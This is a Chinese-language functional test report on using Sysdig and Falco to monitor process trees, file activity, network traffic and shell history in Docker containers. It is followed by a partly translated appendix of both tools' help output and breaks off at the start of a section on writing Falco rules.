SisdigFalco 功能测试

测试环境：
系统：安装于xen4.11上的Ubuntu16.04 LTS
docker版本：18.06.1-ce

SisdigFalco安装

Linux方式安装请参考：
https://github.com/falcosecurity/falco/wiki/How-to-Install-Falco-for-Linux
容器方式安装请参考：
https://github.com/falcosecurity/falco/wiki/How-to-Install-Falco-using-Containers-and-or-Orchestration

Docker容器设置

主要是网络部分的设置，能够让外界访问到

$ docker run -d -P training/webapp python app.py

$ docker container ls -l
CONTAINER ID IMAGE COMMAND CREATED STATUS         PORTS                NAMES
...                                Up 2 seconds   0.0.0.0:49155->5000

进程树信息获取测试

进程树信息展示的内容是进程之间的关系，在正常的Linux系统中使用pstree命令就可以看到这些信息

在本次测试中，我们需要使用sysdig工具看到容器中的进程树信息

如果容器中已经有了pstree这个工具包，那么可以直接用 docker exec 运行pstree来获取进程树信息
如果容器中没有安装pstree这个工具包，那么只能从sysdig中查看进程的信息，sysdig有过滤出来各种类型的进程，比如网络资源占用率最高的进程等等，但是它并没有提供整体进程树这样一种操作

文件操作信息测试

文件操作实际上主要是查看新增的文件，因为攻击者攻击的过程中，很多时候会下载文件到系统中，而这种文件就是我们所需要的样本文件

在本次测试中，我们需要使用sysdig工具看到容器中的文件操作情况，该需求有如下解决方案：

利用falco监视容器中的所有活动，过滤其中的相关操作

网络报文

网络报文是需要将所有的网络操作的流量dump下来

在本次测试中，我们需要使用sysdig工具来过滤流量，然后能看到所有的网络流量操作，对于网络报文的具体内容：

以binary的形式查看
```
sysdig -s2000 -X -c echo_fds
```
以ASCII的形式查看
```
sysdig -s2000 -A -c echo_fds
```
样本

样本指的是攻击者上传的样本

在本次测试中，我们使用sysdig工具要对于该项进行测试的话，我们有以下方案：

监控系统的文件操作，如果有下载的操作，可以视为可疑文件进行监视
分析网络流量的内容，对于其中有下载文件的部分进行监视

history信息

history信息指的是对于shell的记录

在本次测试中，我们使用falco工具可以实现对于shell的命令历史的记录，并且能够记录执行命令的具体用户等信息

sysdig输出的格式

%evt.num %evt.outputtime %evt.cpu %proc.name (%thread.tid) %evt.dir %evt.type %evt.info

evt.num: 增量事件编号
evt.outputtime: 事件时间戳，可自定义
evt.cpu: 捕获事件的CPU编号
proc.name: 生成事件的进程名称
thread.tid: 生成事件的tid，对应于单线程进程的pid
evt.dir: 事件的方向（> 输出事件，< 退出事件）
evt.type: 事件名称，如 ‘open’ ‘read’ ‘write’
evt.info: 事件的参数列表

附录(Sysdig+Falco使用详解翻译)

sysdig -h
sysdig -h
sysdig version 0.24.1
Usage: sysdig [options] [-p <output_format>] [filter]
用法：sysdig [选项] [ -p <输出格式>] [过滤器]

Options:
选项：
 -A, --print-ascii  Only print the text portion of data buffers, and echo
                    end-of-lines. This is useful to only display human-readable
                    data.
 -A， --print-ascii  仅仅打印数据缓冲区的文本部分，并且重复行结尾。这对于仅仅显示人类可读的数据有用。
 -b, --print-base64 Print data buffers in base64. This is useful for encoding
                    binary data that needs to be used over media designed to
                    handle textual data (i.e., terminal or json).
 -b, --print-base64 用base64编码打印数据缓冲区。这对于编码需要利用媒体设计来处理文本数据的二进制数据是有用的
 -B<bpf_probe>, --bpf=<bpf_probe>
                    Enable live capture using the specified BPF probe instead of the kernel module.
                    The BPF probe can also be specified via the environment variable
                    SYSDIG_BPF_PROBE. If <bpf_probe> is left empty, sysdig will
                    try to load one from the sysdig-probe-loader script.     
 -B<bpf规则>, --bpf=<bpf规则>
                    实现了使用特殊的BPF规则而不是内核模块的现场捕获
                    BPF规则也能够通过环境变量SYSDIG_BPF_PROBE来定制化。如果bpf规则为空，sysdig会尝试从sysdig-probe-loader脚本中加载一个
 -c <chiselname> <chiselargs>, --chisel <chiselname> <chiselargs>
                    run the specified chisel. If the chisel require arguments,
                    they must be specified in the command line after the name.
 -c <凿子名称> <凿子参数>, --chisel <凿子名称> <凿子参数>
                    运行特定的凿子。如果凿子需要参数，那么它必须要在名称后被具体化            
 -cl, --list-chisels
                    lists the available chisels. Looks for chisels in
                    ./chisels, ~/.chisels and /usr/share/sysdig/chisels.
 -cl, --list-chisels
                    列出可用的凿子。在./chisels, ~/.chisels和 /usr/share/sysdig/chisels这些文件中寻找凿子
 -C <file_size>, --file-size=<file_size>
                    Before writing an event, check whether the file is
                    currently larger than file_size and, if so, close the
                    current file and open a new one. Saved files will have the
                    name specified with the -w flag, with a number after it,
                    starting at 0 and continuing upward. The units of file_size
                    are millions of bytes (10^6, not 2^20). Use the -W flag to
                    determine how many files will be saved to disk.
 -C <文件大小>, --file-size=<文件大小>
                    在书写一个事件之前，检查文件现在是否比文件大小大，如果是，关闭现在的文件并打开一个新的。用w参数指定的名称以及附带的数字来命名文件，这个数字从0开始。文件大小的单元有几百万个字节。使用-W参数来确定多少文件会被存储到磁盘中
 -d, --displayflt   Make the given filter a display one
                    Setting this option causes the events to be filtered
                    after being parsed by the state system. Events are
                    normally filtered before being analyzed, which is more
                    efficient, but can cause state (e.g. FD names) to be lost.
 -d, --displayflt   给给定的过滤器一个显示操作
                    设定这个选项能够致使在被系统解析之后事件被过滤。事件在被解析之后能被正常的过滤，这是一种更加高效的方法，但是可能导致状态的缺失
 -D, --debug        Capture events about sysdig itself, display internal events
                    in addition to system events, and print additional
                    logging on standard error.
 -D, --debug        捕获sysdig自己的事件，在系统事件之外显示内部事件，并且打印标准错误的额外日志
 -E, --exclude-users
                    Don't create the user/group tables by querying the OS when
                    sysdig starts. This also means that no user or group info
                    will be written to the trace file by the -w flag.
                    The user/group tables are necessary to use filter fields
                    like user.name or group.name. However, creating them can
                    increase sysdig's startup time. Moreover, they contain
                    information that could be privacy sensitive.
 -E, --exclude-users
                    当sysdig开启时询问操作系统不要创建user/group表。这也意味着没有用户或者组的信息会通过-w标志被写到trace文件中。
                    这个用户/组表对于过滤区域来说是很必要的，比如使用user.name或者group.name。然而，创建它们会增加sysdig的启动时间。并且，它们会包含一些隐私信息。
 -e <num_events>    If used together with -w option, creates a series of dump files
                    containing only a specified number of events given in num_events
                    parameter each.
                    Used alongside -W flags creates a ring buffer of file containing
                    num_events each.
 -e <num_events>    如果和-w选项一起使用，
 -F, --fatfile      Enable fatfile mode
                    when writing in fatfile mode, the output file will contain
                    events that will be invisible when reading the file, but
                    that are necessary to fully reconstruct the state.
                    Fatfile mode is useful when saving events to disk with an
                    aggressive filter. The filter could drop events that would
                    the state to be updated (e.g. clone() or open()). With
                    fatfile mode, those events are still saved to file, but
                    'hidden' so that they won't appear when reading the file.
                    Be aware that using this flag might generate substantially
                    bigger traces files.
 --filter-proclist  apply the filter to the process table
                    a full dump of /proc is typically included in any trace file
                    to make sure all the state required to decode events is in the
                    file. This could cause the file to contain unwanted or sensitive
                    information. Using this flag causes the command line filter to
                    be applied to the /proc dump as well.
 -G <num_seconds>, --seconds=<num_seconds>
                    Rotates the dump file specified with the -w option every
                    num_seconds seconds. Saved files will have the name specified
                    by -w which should include a time format as defined by strftime(3).
                    If no time format is specified, a counter will be used.
                    If no data format is specified, this can be used with -W flag to
                    create a ring buffer of events.
 -h, --help         Print this page
 -i <chiselname>, --chisel-info <chiselname>
                    Get a longer description and the arguments associated with
                    a chisel found in the -cl option list.
 -j, --json         Emit output as json, data buffer encoding will depend from the
                    print format selected.
 -k <url>, --k8s-api=<url>
                    Enable Kubernetes support by connecting to the API server
                    specified as argument. E.g. "http://admin:password@127.0.0.1:8080".
                    The API server can also be specified via the environment variable
                    SYSDIG_K8S_API.
 -K <bt_file> | <cert_file>:<key_file[#password]>[:<ca_cert_file>], --k8s-api-cert=<bt_file> | <cert_file>:<key_file[#password]>[:<ca_cert_file>]
                    Use the provided files names to authenticate user and (optionally) verify the K8S API
                    server identity.
                    Each entry must specify full (absolute, or relative to the current directory) path
                    to the respective file.
                    Private key password is optional (needed only if key is password protected).
                    CA certificate is optional. For all files, only PEM file format is supported. 
                    Specifying CA certificate only is obsoleted - when single entry is provided 
                    for this option, it will be interpreted as the name of a file containing bearer token.
                    Note that the format of this command-line option prohibits use of files whose names contain
                    ':' or '#' characters in the file name.
                    Option can also be provided via the environment variable SYSDIG_K8S_API_CERT.
 -L, --list-events  List the events that the engine supports
 -l, --list         List the fields that can be used for filtering and output
                    formatting. Use -lv to get additional information for each
                    field.
 --list-markdown    like -l, but produces markdown output
 -m <url[,marathon_url]>, --mesos-api=<url[,marathon_url]>
                    Enable Mesos support by connecting to the API server
                    specified as argument. E.g. "http://admin:password@127.0.0.1:5050".
                    Marathon url is optional and defaults to Mesos address, port 8080.
                    The API servers can also be specified via the environment variable
                    SYSDIG_MESOS_API.
 -M <num_seconds>   Stop collecting after <num_seconds> reached.
 -n <num>, --numevents=<num>
                    Stop capturing after <num> events
 --page-faults      Capture user/kernel major/minor page faults
 -P, --progress     Print progress on stderr while processing trace files
 -p <output_format>, --print=<output_format>
                    Specify the format to be used when printing the events.
                    With -pc or -pcontainer will use a container-friendly format.
                    With -pk or -pkubernetes will use a kubernetes-friendly format.
                    With -pm or -pmesos will use a mesos-friendly format.
                    See the examples section below for more info.
 -q, --quiet        Don't print events on the screen
                    Useful when dumping to disk.
 -R                 Resolve port numbers to names.
 -r <readfile>, --read=<readfile>
                    Read the events from <readfile>.
 -S, --summary      print the event summary (i.e. the list of the top events)
                    when the capture ends.
 -s <len>, --snaplen=<len>
                    Capture the first <len> bytes of each I/O buffer.
                    By default, the first 80 bytes are captured. Use this
                    option with caution, it can generate huge trace files.
 -t <timetype>, --timetype=<timetype>
                    Change the way event time is displayed. Accepted values are
                    h for human-readable string, a for absolute timestamp from
                    epoch, r for relative time from the beginning of the
                    capture, d for delta between event enter and exit, and
                    D for delta from the previous event.
 -T, --force-tracers-capture
                    Tell the driver to make sure full buffers are captured from
                    /dev/null, to make sure that tracers are completely
                    captured. Note that sysdig will enable extended /dev/null
                    capture by itself after detecting that tracers are written
                    there, but that could result in the truncation of some
                    tracers at the beginning of the capture. This option allows
                    preventing that.
 --unbuffered       Turn off output buffering. This causes every single line
                    emitted by sysdig to be flushed, which generates higher CPU
                    usage but is useful when piping sysdig's output into another
                    process or into a script.
 -U, --suppress-comm
                    Ignore all events from processes having the provided comm.
 -v, --verbose      Verbose output.
                    This flag will cause the full content of text and binary
                    buffers to be printed on screen, instead of being truncated
                    to 40 characters. Note that data buffers length is still
                    limited by the snaplen (refer to the -s flag documentation)
                    -v will also make sysdig print some summary information at
                    the end of the capture.
 --version          Print version number.
 -w <writefile>, --write=<writefile>
                    Write the captured events to <writefile>.
 -W <num>, --limit <num>
                    Used in conjunction with the -C option, this will limit the number
                    of files created to the specified number, and begin overwriting files
                    from the beginning, thus creating a 'rotating' buffer.

                    Used in conjunction with the -G option, this will limit the number
                    of rotated dump files that get created, exiting with status 0 when
                    reaching the limit. If used with -C as well, the behavior will result
                    in cyclical files per timeslice.
 -x, --print-hex    Print data buffers in hex.
 -X, --print-hex-ascii
                    Print data buffers in hex and ASCII.
 -z, --compress     Used with -w, enables compression for trace files.

Output format:

By default, sysdig prints the information for each captured event on a single
 line with the following format:

 %evt.num %evt.outputtime %evt.cpu %proc.name (%thread.tid) %evt.dir %evt.type %evt.info

where:
 evt.num is the incremental event number
 evt.time is the event timestamp
 evt.cpu is the CPU number where the event was captured
 proc.name is the name of the process that generated the event
 thread.tid id the TID that generated the event, which corresponds to the
   PID for single thread processes
 evt.dir is the event direction, > for enter events and < for exit events
 evt.type is the name of the event, e.g. 'open' or 'read'
 evt.info is the list of event arguments.

The output format can be customized with the -p switch, using any of the
fields listed by 'sysdig -l'.

Using -pc or -pcontainer, the default format will be changed to a container-friendly one:

%evt.num %evt.outputtime %evt.cpu %container.name (%container.id) %proc.name (%thread.tid:%thread.vtid) %evt.dir %evt.type %evt.info

Using -pk or -pkubernetes, the default format will be changed to a kubernetes-friendly one:

%evt.num %evt.outputtime %evt.cpu %k8s.pod.name (%container.id) %proc.name (%thread.tid:%thread.vtid) %evt.dir %evt.type %evt.info

Using -pm or -pmesos, the default format will be changed to a mesos-friendly one:

%evt.num %evt.outputtime %evt.cpu %mesos.task.name (%container.id) %proc.name (%thread.tid:%thread.vtid) %evt.dir %evt.type %evt.info

Examples:
样例：

 Capture all the events from the live system and print them to screen
   $ sysdig
 从live系统中捕获所有的事件并且把他们打印到屏幕上
   $ sysdig
 
 Capture all the events from the live system and save them to disk
   $ sysdig -w dumpfile.scap
 从live系统中捕获所有的事件并且把他们存储到磁盘中
   $ sysdig -w dumpfile.scap
 
 Read events from a file and print them to screen
   $ sysdig -r dumpfile.scap
 从文件中读取事件并把他们打印到屏幕上
   $ sysdig -r dumpfile.scap

 Print all the open system calls invoked by cat
   $ sysdig proc.name=cat and evt.type=open
 打印所有的使用了cat的开放系统调用
   $ sysdig proc.name=cat and evt.type=open

 Print the name of the files opened by cat
   $ sysdig -p"%evt.arg.name" proc.name=cat and evt.type=open
 打印所有的被cat打开的文件的名称
   $ sysdig -p"%evt.arg.name" proc.name=cat and evt.type=open

falco用法

falco version 0.12.1
Usage: falco [options]

Options:
 -h, --help                    Print this page
                               打印这页的内容
 -c                            Configuration file (default /mnt/workspace/falco-build-stable/label/builder-agent-64/falco/falco.yaml, /etc/falco/falco.yaml)
                               配置文件（默认 /mnt/workspace/falco-build-stable/label/builder-agent-64/falco/falco.yaml,/etc/falco/falco.yaml）
 -A                            Monitor all events, including those with EF_DROP_FALCO flag.
                               监控所有事件，包括那些带有EF_DROP_FALCO标签的
 -d, --daemon                  Run as a daemon
                               以后台方式运行
 -D <pattern>                  Disable any rules matching the regex <pattern>. Can be specified multiple times.
                               Can not be specified with -t.
                               禁用所有匹配到正则表达式模式的规则，这个模式可以被多次具体化，但是它不能被具体化加上-t参数
 -e <events_file>              Read the events from <events_file> (in .scap format) instead of tapping into live.
                               从事件文件（形式为.scap）中读取事件，而不是利用实况
 -k <url>, --k8s-api=<url>
                               Enable Kubernetes support by connecting to the API server
                               specified as argument. E.g. "http://admin:password@127.0.0.1:8080".
                               The API server can also be specified via the environment variable
                               FALCO_K8S_API.
                               通过连接参数中具体指明的API服务器实现Kubernetes支持。例："http://admin:password@127.0.0.1:8080"。这个API服务器也能够通过环境变量FALCO_K8S_API中指定。
 -K <bt_file> | <cert_file>:<key_file[#password]>[:<ca_cert_file>], --k8s-api-cert=<bt_file> | <cert_file>:<key_file[#password]>[:<ca_cert_file>]
                               Use the provided files names to authenticate user and (optionally) verify the K8S API
                               server identity.
                               Each entry must specify full (absolute, or relative to the current directory) path
                               to the respective file.
                               Private key password is optional (needed only if key is password protected).
                               CA certificate is optional. For all files, only PEM file format is supported. 
                               Specifying CA certificate only is obsoleted - when single entry is provided 
                               for this option, it will be interpreted as the name of a file containing bearer token.
                               Note that the format of this command-line option prohibits use of files whose names contain
                               ':' or '#' characters in the file name.
                               使用提供的文件名来认证用户以及（可选）确认k8s API服务器的身份。
                               每一个路径都要指定完全（绝对路径，或者相对于当前的目录）
 -L                            Show the name and description of all rules and exit.
                               显示所有规则的名字和描述以及退出
 -l <rule>                     Show the name and description of the rule with name <rule> and exit.
                               显示特定的规则的名字和描述以及退出
 -m <url[,marathon_url]>, --mesos-api=<url[,marathon_url]>
                               Enable Mesos support by connecting to the API server
                               specified as argument. E.g. "http://admin:password@127.0.0.1:5050".
                               Marathon url is optional and defaults to Mesos address, port 8080.
                               The API servers can also be specified via the environment variable
                               FALCO_MESOS_API.
                               通过连接参数指定的API server来允许Mesos支持。例："http://admin:password@127.0.0.1:5050"。Marathon url是可选的，并且对于Mesos地址是默认的，端口是80080。这个API server也能够通过环境变量FALCO_MESOS_API来指定。
 -M <num_seconds>              Stop collecting after <num_seconds> reached.
                               在<num_seconds>到达后停止收集
 -o, --option <key>=<val>      Set the value of option <key> to <val>. Overrides values in configuration file.
                               <key> can be a two-part <key>.<subkey>
                               设置选项的值<key>到<val>。覆盖值到配置文件。<key>能够是两部分<key>.<subkey>
 -p <output_format>, --print=<output_format>
                               Add additional information to each falco notification's output.
                               With -pc or -pcontainer will use a container-friendly format.
                               With -pk or -pkubernetes will use a kubernetes-friendly format.
                               With -pm or -pmesos will use a mesos-friendly format.
                               Additionally, specifying -pc/-pk/-pm will change the interpretation
                               of %container.info in rule output fields
                               See the examples section below for more info.
                               增加附加信息到每个falco通知的输出。
                               用-pc或者-pcontainer会使用容器友好的形式。
                               用-pk或者-pkubernetes会使用kubernetes友好的形式。
                               用-pm或者-pmesos会使用mesos友好的形式。
                               另外，指定-pc/-pk/-pm会改变规则输出中%container.info的完整性
                               查看下面的样例区得到更多信息
 -P, --pidfile <pid_file>      When run as a daemon, write pid to specified file
                               当在后台运行时，写进程的pid到一个特定文件
 -r <rules_file>               Rules file/directory (defaults to value set in configuration file,
                               or /etc/falco_rules.yaml). Can be specified multiple times to read
                               from multiple files/directories.
                               规则文件/目录（默认来设置配置文件或者是/etc/falco_rules.yaml中的值）。能够指定多次来阅读复杂的文件或者目录
 -s <stats_file>               If specified, write statistics related to falco's reading/processing of events
                               to this file. (Only useful in live mode).
                               如果被指定，写与falco的读取或者进程事件相关的数据到这个文件中（只在live模式下有效）
 -T <tag>                      Disable any rules with a tag=<tag>. Can be specified multiple times.
                               Can not be specified with -t.
                               禁止所有带有标签的规则。能够被具体化很多次。不能被-t指定。
 -t <tag>                      Only run those rules with a tag=<tag>. Can be specified multiple times.
                               Can not be specified with -T/-D.
                               仅仅运行这些规则用一个标签。能够被具体化多次。不能被-T/-D指定。
 -U,--unbuffered               Turn off output buffering to configured outputs. This causes every
                               single line emitted by falco to be flushed, which generates higher CPU
                               usage but is useful when piping those outputs into another process
                               or into a script.
                               关闭输出缓冲区来配置输出。这使得falco的每行输出都被flush，这导致了更高的CPU占用率，但是当把这些输出输送到另一个进程或者脚本的时候这样就更加有效了
 -V,--validate <rules_file>    Read the contents of the specified rules(s) file and exit
                               Can be specified multiple times to validate multiple files.
                               读取特定规则文件的内容以及退出，对于有效的文件能够被具体化多次
 -v                            Verbose output.
                               冗余输出
 --version                     Print version number.
                               打印出版本号

falco规则写法

falco是原生支持container的，并且它提供包括网络，进程，文件等等信息的监控，具体的监控方式可以自己制定规则来实现

falco最重要的内容即为其规则文件，falco需要这个规则文件来实现多样的监控

1	falco 规则编写解析：